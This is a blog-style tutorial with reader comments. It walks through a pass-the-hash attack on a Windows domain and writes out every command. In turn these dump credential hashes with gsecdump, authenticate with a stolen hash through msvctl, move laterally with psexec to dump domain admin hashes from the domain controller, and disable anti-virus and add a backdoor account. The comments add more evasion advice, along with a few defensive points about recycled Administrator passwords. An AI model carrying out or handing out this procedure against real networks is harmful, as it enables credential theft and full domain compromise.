12.08
This is a short tutorial on how an attacker could take control of your network, for this attack to work you will need to have an account that is reused throughout the network e.g. local “Administrator” it is very common to recycle the password for this account on every machine. You will also need to have access to a machine that has the account on it and it will need be joined to the domain, if both of these factors are in place then you are ready to begin.
Tools required for this attack
- Gsecdump.exe | Hash dumper
- Msvctl.exe | Similar to run as. This tool was created by truesec and is used to create a runas session using a hash for authentication, this tool is basically a modified SMB client that takes a hash instead of a password.
- Psexec.exe | Microsoft tool for remote execution
Each of these tools are readily available online
Step 1
Fire up command prompt and run the gsecdump tool.
C:\gsecdumpe.exe –a | -a grabs all secrets (hashes)
You should see the hashes as shown above.
Copy the hashes into your favourite text editor and reformat the required hash so it is contained on one line with no spaces, in this case we are interested in the Local Administrator account.
“Administrator(current):500:7dee762647704278695109ab020e401c:85a1bacace8f32e71c491d6d9f53a2c5:::”
Step 2
We want to run the msvctl.exe tool this will do a similar job to run as but we are able to specify a hash instead of credentials, the command below will launch a new cmd session in which we are authenticated as the local administrator.
C:\msvctl.exe Administrator(current):500:7dee762647704278695109ab0
20e401c:85a1bacace8f32e71c491d6d9f53a2c5::: run cmd
You will then be prompted with a new command prompt shell this, shell is now pre-authenticated with the local “Administrator” accounts hash.
Step 3
Your new command prompt shell should allow you to create a NetBIOS IPC$ session to any node the happens to share the same local “Administrator” account with the same password.
C:\net use \\192.168.31.45\c$
Our shell that we had opened with the msvctl.exe tool is now successfully authenticated.
Step 4
Now that we have a NetBIOS session setup we can run a handy tool called psexec.exe which is a Microsoft tool that will allow us to run programs remotely using the NetBIOS session.
C:\psexec.exe \\192.168.31.45 –c gsecdump.exe –a | -c will copy the file to the target
We now have remotely dumped another users hashes including domain logon (James.Brown)
#NOTE: in the above step we used the file gsecdump.exe with “psexec” but you can use almost anything including “cmd” which will fire back a fully interactive command prompt from the target very handy if you need to kill any services such as anti-virus or firewall.
Step 5
Next step we repeat the previous steps using the hash for James.Brown (Which happens to be a Domain Admin).
C:\msvctl.exe James.Brown::7dee762647704278695109ab020e401c:85a1bacace8f32e7
1c491d6d9f53a2c5:::
C:\net use \\192.168.31.1\c$ # our domain controller
C:\psexec.exe \\192.168.31.1 –c gsecdump.exe –a # use pwdump4 if gsecdump fails
You now have the hashes for all users from that domain controller, and can do anything else you like while you have the session up, maybe fire up a cmd shell to the DC and add yourself a new user which you know the password for and then fire up a remote desktop session.
Additional note: Most Anti-virus software should pick up gsecdump when it is being copied to a remote machine and the attack might experience a set back but if he has got a session to the remote machine with local administrator there is not a lot stopping him or her from finding and stopping the anti-virus service from commandline then uploading the gsecdump and then enabling the service again afterwards.
Please feel free to leave any comments or suggestions in regards to this, if you want to give it a go it is very simple to lab up with a few vm images and some 30 day trials of windows.
Grim F4ilure
Scary how simple yet powerful this is!
Yea it just goes to show how serious you should take endpoint security, and a very valid reason not to use recycled service accounts. As I mentioned most client AV scanners may detect tools being copied to the remote client such as the gsecdump, but since the attacker can fire up an interactive CMD.exe remotely and then stop services such as AV, or if the AV does not allow the service to be stopped you can simply change the default start-up type for the service from automatic to manual or disabled and then kill the process for the AV, this will stop the AV from starting a new process and detecting the attackers tools, there is ways around anything but I feel this demonstrates how simple it can be to take control over a domain in the right circumstances.
I did also want to point out that I did mention dumping the hashes from the SAM on the domain controller, although the DC does not directly use the SAM for domain authentication process it is still used for some restore mode/s and there for is still populated with the domain users hashes.
One other point to mention, which I think you know but for the benifit of others reading this is that Vista and Windows 7 I belive is the same forces you to create a user account when you setup the machine which becomes a member of the administrators group and then disabled the Administrator account. Which is good in some ways as this stops this recycling of the Administrator account amoung machines on the network.
Yea that is correct Marcus Murray from Truesec who demonstrated this attack some time back also mentioned on Vista that the local Administrator account is disabled by default so I assume it applies to Window 7 too, but still they can be enabled and you can be sure people do it still.